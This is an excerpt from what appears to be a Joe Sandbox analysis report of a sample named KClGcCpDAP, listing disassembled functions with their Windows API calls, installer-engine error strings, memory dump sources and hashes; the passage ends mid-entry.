                                                            Strings
                                                            • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00876F6B
                                                            • Failed to find variable value '%ls'., xrefs: 00876DE3
                                                            • Setting numeric variable '%ls' to value %lld, xrefs: 00876EFA
                                                            • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00876ED0
                                                            • Unsetting variable '%ls', xrefs: 00876F15
                                                            • variable.cpp, xrefs: 00876E4B
                                                            • Failed to set value of variable: %ls, xrefs: 00876F41
                                                            • Setting string variable '%ls' to value '%ls', xrefs: 00876EED
                                                            • Setting hidden variable '%ls', xrefs: 00876E86
                                                            • Attempt to set built-in variable value: %ls, xrefs: 00876E56
                                                            • Failed to insert variable '%ls'., xrefs: 00876E0D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                            • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                            • API String ID: 2716280545-445000439
                                                            • Opcode ID: b461dcf7d5690130627b784d309db2aca957be814dea71eb79f657db3436be7a
                                                            • Instruction ID: c190c30379d6e1bde937599dd85647f33099d3edb78b091c66ef90cdcfab6891
                                                            • Opcode Fuzzy Hash: b461dcf7d5690130627b784d309db2aca957be814dea71eb79f657db3436be7a
                                                            • Instruction Fuzzy Hash: 31512B72A40615ABDB309F18DC4AFAB7BA8FB51714F208119F80CE6385E675DC60CBE1
                                                            APIs
                                                            • CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00882C8A
                                                            Strings
                                                            • wininet.dll, xrefs: 00882ED7
                                                            • Failed to add dependent bundle provider key to ignore dependents., xrefs: 00882DF4
                                                            • Failed to create the string dictionary., xrefs: 00882CC3
                                                            • Failed to add registration action for dependent related bundle., xrefs: 00882F8E
                                                            • Failed to add self-dependent to ignore dependents., xrefs: 00882D0E
                                                            • crypt32.dll, xrefs: 00882CD5, 00882DCF, 00882EC4, 00882F39
                                                            • Failed to add dependents ignored from command-line., xrefs: 00882D3F
                                                            • Failed to add registration action for self dependent., xrefs: 00882F57
                                                            • Failed to allocate registration action., xrefs: 00882CF3
                                                            • Failed to check for remaining dependents during planning., xrefs: 00882E30
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
                                                            • API String ID: 1825529933-1705955799
                                                            • Opcode ID: 50d71efc3a5c40785b4c7fae8dc57118e178bff192f6776262fe955de8a9ec6b
                                                            • Instruction ID: cd578a383b671e0cb2465b889601854ebcf1cdd9f1f605e5fa23130ab98c3435
                                                            • Opcode Fuzzy Hash: 50d71efc3a5c40785b4c7fae8dc57118e178bff192f6776262fe955de8a9ec6b
                                                            • Instruction Fuzzy Hash: FBB16A70A0021AEFDF29EF68C881BAABBB5FF04710F008169F915EB251CB70D950CB91
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0088F947
                                                            • UuidCreate.RPCRT4(?), ref: 0088FA2A
                                                            • StringFromGUID2.OLE32(?,?,00000027), ref: 0088FA4B
                                                            • LeaveCriticalSection.KERNEL32(?,?), ref: 0088FAF4
                                                            Strings
                                                            • Failed to recreate command-line for update bundle., xrefs: 0088FA12
                                                            • Failed to convert bundle update guid into string., xrefs: 0088FA6A
                                                            • Failed to create bundle update guid., xrefs: 0088FA37
                                                            • update\%ls, xrefs: 0088F9A3
                                                            • EngineForApplication.cpp, xrefs: 0088FA60
                                                            • Failed to set update bundle., xrefs: 0088FACE
                                                            • Failed to default local update source, xrefs: 0088F9B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CreateEnterFromLeaveStringUuid
                                                            • String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                            • API String ID: 171215650-2594647487
                                                            • Opcode ID: 87a126003542f3cb8a867d36373b0e305007412d860cb656781d761531717896
                                                            • Instruction ID: 3470c7304c45cf4af41a3ea28ef9e5aadcb4844938160d8edd1cd16dfc540d1a
                                                            • Opcode Fuzzy Hash: 87a126003542f3cb8a867d36373b0e305007412d860cb656781d761531717896
                                                            • Instruction Fuzzy Hash: 7E614C31940229ABCF25AFA8CC45FAA7BB4FF08724F154179FA09EB252D6719C50CB91
                                                            APIs
                                                            • IsWindow.USER32(?), ref: 00874C64
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00874C75
                                                            Strings
                                                            • WixBundleLayoutDirectory, xrefs: 00874BF5
                                                            • Failed while running , xrefs: 00874C2A
                                                            • Failed to create the message window., xrefs: 00874B98
                                                            • Failed to set registration variables., xrefs: 00874BDE
                                                            • Failed to query registration., xrefs: 00874BAE
                                                            • Failed to set action variables., xrefs: 00874BC4
                                                            • Failed to check global conditions, xrefs: 00874B49
                                                            • Failed to set layout directory variable to value provided from command-line., xrefs: 00874C06
                                                            • Failed to open log., xrefs: 00874B18
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: MessagePostWindow
                                                            • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                            • API String ID: 3618638489-3051724725
                                                            • Opcode ID: 9349eeb5b947455c04f5ea252465bedd40577318024d14b651c025e91661fe73
                                                            • Instruction ID: fc061f5e311fea26042dfa0db3df2034ca42de9fcbdcb9a415a5b9de0539acf8
                                                            • Opcode Fuzzy Hash: 9349eeb5b947455c04f5ea252465bedd40577318024d14b651c025e91661fe73
                                                            • Instruction Fuzzy Hash: FF41E43164161FBBCB276A64CC85FBAB66CFF00764F009215F818E6254DBB4EC5097D1
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 0088F06E
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0088F19B
                                                            Strings
                                                            • Failed to post launch approved exe message., xrefs: 0088F186
                                                            • Failed to copy the id., xrefs: 0088F100
                                                            • Engine is active, cannot change engine state., xrefs: 0088F089
                                                            • Failed to copy the arguments., xrefs: 0088F12D
                                                            • EngineForApplication.cpp, xrefs: 0088F17C
                                                            • UX requested unknown approved exe with id: %ls, xrefs: 0088F0CE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                            • String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                            • API String ID: 1367039788-528931743
                                                            • Opcode ID: 9dadc29e89650ee263f0899b8a5340e7677ac978b8c2693503a6a401ba956c4f
                                                            • Instruction ID: 63a53cf9bb76da51a53047c582372a223f331090615b027a4f528e1fd44f09b3
                                                            • Opcode Fuzzy Hash: 9dadc29e89650ee263f0899b8a5340e7677ac978b8c2693503a6a401ba956c4f
                                                            • Instruction Fuzzy Hash: 7D31B436A40626EFCB22AF68DC49E5A77A8FF04720B018525FE04EB252EB75DD008791
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0088A7D4,00000000,00000000,00000000,?,00000000), ref: 008896B8
                                                            • GetLastError.KERNEL32(?,0088A7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008896C6
                                                              • Part of subcall function 008B4102: Sleep.KERNEL32(?,00000000,?,008885EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00874DBC), ref: 008B4119
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 008897A4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorFileHandleLastSleep
                                                            • String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                            • API String ID: 1275171361-1187406825
                                                            • Opcode ID: ff055f70628824e85826d4e378e333ca5d71476c875d13dceb5bcebaebc9f627
                                                            • Instruction ID: 03d4be5ad2350bc6e7d7da88dadb9bf05465af5aa421022162e0c96a6914ece4
                                                            • Opcode Fuzzy Hash: ff055f70628824e85826d4e378e333ca5d71476c875d13dceb5bcebaebc9f627
                                                            • Instruction Fuzzy Hash: A4210432A806257BD6223D188C46FBB3668FF51B60F180118FE55FA381D2A2DC019AE6
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00876FB2
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008771BE
                                                            Strings
                                                            • Failed to set variable value., xrefs: 00877171
                                                            • Unsupported variable type., xrefs: 00877184
                                                            • Failed to read variable value type., xrefs: 008771A0
                                                            • Failed to read variable literal flag., xrefs: 00877199
                                                            • Failed to read variable value as number., xrefs: 00877178
                                                            • Failed to read variable count., xrefs: 00876FD2
                                                            • Failed to read variable name., xrefs: 008771A7
                                                            • Failed to read variable value as string., xrefs: 0087718B
                                                            • Failed to read variable included flag., xrefs: 008771AE
                                                            • Failed to set variable., xrefs: 00877192
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                            • API String ID: 3168844106-528957463
                                                            • Opcode ID: eb3192e3f51e34a9d1c5bd5f047cd2a5b5bb394a176da28451b33187babdf0c4
                                                            • Instruction ID: 8a7f03e81aac1f8abaecc570b3432a999332ea6b6a2eaec9bafa17373db334bd
                                                            • Opcode Fuzzy Hash: eb3192e3f51e34a9d1c5bd5f047cd2a5b5bb394a176da28451b33187babdf0c4
                                                            • Instruction Fuzzy Hash: C9718C72C0421EBBDF12DAA8CD41EAEBBB9FB01714F508121F914E6264E731DE10DBA0
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 008B4550
                                                            • GetLastError.KERNEL32 ref: 008B4566
                                                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 008B45BF
                                                            • GetLastError.KERNEL32 ref: 008B45C9
                                                            • SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 008B461D
                                                            • GetLastError.KERNEL32 ref: 008B4628
                                                            • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 008B4717
                                                            • CloseHandle.KERNEL32(?), ref: 008B478A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 3286166115-2967768451
                                                            • Opcode ID: e128bde8859954fc55772ce5ebffb44bef50e12bd96904ded506592a015c1e74
                                                            • Instruction ID: 86d7e20cb2e92d5e2784ecfb0f13d397079869c3c8571245e201b2d2a455c20c
                                                            • Opcode Fuzzy Hash: e128bde8859954fc55772ce5ebffb44bef50e12bd96904ded506592a015c1e74
                                                            • Instruction Fuzzy Hash: 79813831A4062AEBEB318E598C43BFB77A8FB01724F115229FD55EB382E774CD008695
                                                            APIs
                                                            • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 008730C1
                                                            • GetLastError.KERNEL32 ref: 008730C7
                                                            • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 00873121
                                                            • GetLastError.KERNEL32 ref: 00873127
                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008731DB
                                                            • GetLastError.KERNEL32 ref: 008731E5
                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087323B
                                                            • GetLastError.KERNEL32 ref: 00873245
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                            • String ID: @$pathutil.cpp
                                                            • API String ID: 1547313835-3022285739
                                                            • Opcode ID: 99e2605b1f68d2594c02d7924db96764b28c21066dea8cb91f7222b1f9ffa5b1
                                                            • Instruction ID: 0583dd0d83ab1ca2b4105e3421c41a128eab3d3abea324f2a5558d75484bb334
                                                            • Opcode Fuzzy Hash: 99e2605b1f68d2594c02d7924db96764b28c21066dea8cb91f7222b1f9ffa5b1
                                                            • Instruction Fuzzy Hash: 0361D533D00629BBDB219AE48844B9EB768FB00755F11C265EE08FB255E771DF00A7E2
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,74DEDFD0,?,008B72C8,?,?), ref: 008B6DA6
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6E11
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6E89
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6EC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$Free$Compare
                                                            • String ID: `<u$label$scheme$term
                                                            • API String ID: 1324494773-4028212031
                                                            • Opcode ID: 801a1207353f50cf758124726e6024784a177b1d88f134a7f59e844990dfbfc9
                                                            • Instruction ID: 033b1904236272613226b61b19558852eea688099db2515f538f03379ba65ddb
                                                            • Opcode Fuzzy Hash: 801a1207353f50cf758124726e6024784a177b1d88f134a7f59e844990dfbfc9
                                                            • Instruction Fuzzy Hash: B8513D35901219FBCB15DB94C845EEEBBB8FF04711F2802A9E511E62A0E775DE20DB50
                                                            APIs
                                                            • UuidCreate.RPCRT4(?), ref: 00884DC0
                                                            • StringFromGUID2.OLE32(?,?,00000027), ref: 00884DEF
                                                            • UuidCreate.RPCRT4(?), ref: 00884E3A
                                                            • StringFromGUID2.OLE32(?,?,00000027), ref: 00884E66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateFromStringUuid
                                                            • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                            • API String ID: 4041566446-2510341293
                                                            • Opcode ID: 9a34156aa5b7fc9808950b09c63e1d92c21071506500af950d19dcebbc79a845
                                                            • Instruction ID: 7d7611b60f9e9c6e06178bcd2946ad4dc64ba0a7aed696e6434ac33ea0ef903f
                                                            • Opcode Fuzzy Hash: 9a34156aa5b7fc9808950b09c63e1d92c21071506500af950d19dcebbc79a845
                                                            • Instruction Fuzzy Hash: 79416A72D40309ABDB20EBE8C945FDEB7F8FB54720F20412AE905FB240D6759945CB91
                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,0087548E,?,?), ref: 0088EA9D
                                                            • GetLastError.KERNEL32(?,0087548E,?,?), ref: 0088EAAA
                                                            • CreateThread.KERNEL32(00000000,00000000,0088E7B4,?,00000000,00000000), ref: 0088EB03
                                                            • GetLastError.KERNEL32(?,0087548E,?,?), ref: 0088EB10
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,0087548E,?,?), ref: 0088EB4B
                                                            • CloseHandle.KERNEL32(00000000,?,0087548E,?,?), ref: 0088EB6A
                                                            • CloseHandle.KERNEL32(?,?,0087548E,?,?), ref: 0088EB77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                            • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                            • API String ID: 2351989216-3599963359
                                                            • Opcode ID: f60f7e866ed3187ab9fdffc835cb85a3377895ecf82cac7238d8ff4bbe9ce98d
                                                            • Instruction ID: 614d6aa1b1b3e37568bf4655e242cc49aca41248a4d954f8a10110f5b4febcb5
                                                            • Opcode Fuzzy Hash: f60f7e866ed3187ab9fdffc835cb85a3377895ecf82cac7238d8ff4bbe9ce98d
                                                            • Instruction Fuzzy Hash: 00319276D41229BFDB10AF998D85AAFBBB8FF04760F110169F915F7240E6709E008BA1
                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,0087548E,?,?), ref: 0088E666
                                                            • GetLastError.KERNEL32(?,?,0087548E,?,?), ref: 0088E673
                                                            • CreateThread.KERNEL32(00000000,00000000,0088E3C8,00000000,00000000,00000000), ref: 0088E6D2
                                                            • GetLastError.KERNEL32(?,?,0087548E,?,?), ref: 0088E6DF
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,0087548E,?,?), ref: 0088E71A
                                                            • CloseHandle.KERNEL32(?,?,?,0087548E,?,?), ref: 0088E72E
                                                            • CloseHandle.KERNEL32(?,?,?,0087548E,?,?), ref: 0088E73B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                            • String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                            • API String ID: 2351989216-1977201954
                                                            • Opcode ID: 27d3e523d8645fe0d21d1cab29e9178b73c5e00cbee3f2ed42f85aa04b0964c5
                                                            • Instruction ID: 814c0916399d256b980e25107882821181fba4dd0d03c326e40ec649217f19f7
                                                            • Opcode Fuzzy Hash: 27d3e523d8645fe0d21d1cab29e9178b73c5e00cbee3f2ed42f85aa04b0964c5
                                                            • Instruction Fuzzy Hash: 4F319776D4062ABBDB21AB99CC45AAFBBB8FF54710F11416AFD10F6240E7749900CBD1
                                                            APIs
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,00875405,008753BD,00000000,00875445), ref: 00891506
                                                            • GetLastError.KERNEL32 ref: 00891519
                                                            • GetExitCodeThread.KERNEL32(008BB488,?), ref: 0089155B
                                                            • GetLastError.KERNEL32 ref: 00891569
                                                            • ResetEvent.KERNEL32(008BB460), ref: 008915A4
                                                            • GetLastError.KERNEL32 ref: 008915AE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                             • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                            • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                            • API String ID: 2979751695-3400260300
                                                            • Opcode ID: 8e403bae2e48be31fb2f798d2548eaffc5be10ad48632159f5486baf6baa91d7
                                                            • Instruction ID: 5848789005293c5e6a05228567f22e4164d1cb1423b99b14a64912751b65e456
                                                            • Opcode Fuzzy Hash: 8e403bae2e48be31fb2f798d2548eaffc5be10ad48632159f5486baf6baa91d7
                                                            • Instruction Fuzzy Hash: C831B870B44207EBDF10AF698D09BAE7BF8FB44710B12816AF916D6250E774CD009B51
                                                            APIs
                                                            • SetEvent.KERNEL32(008BB478,?,00000000,?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000,?), ref: 0089161B
                                                            • GetLastError.KERNEL32(?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000,?,00875489,FFF9E89D,00875489), ref: 00891625
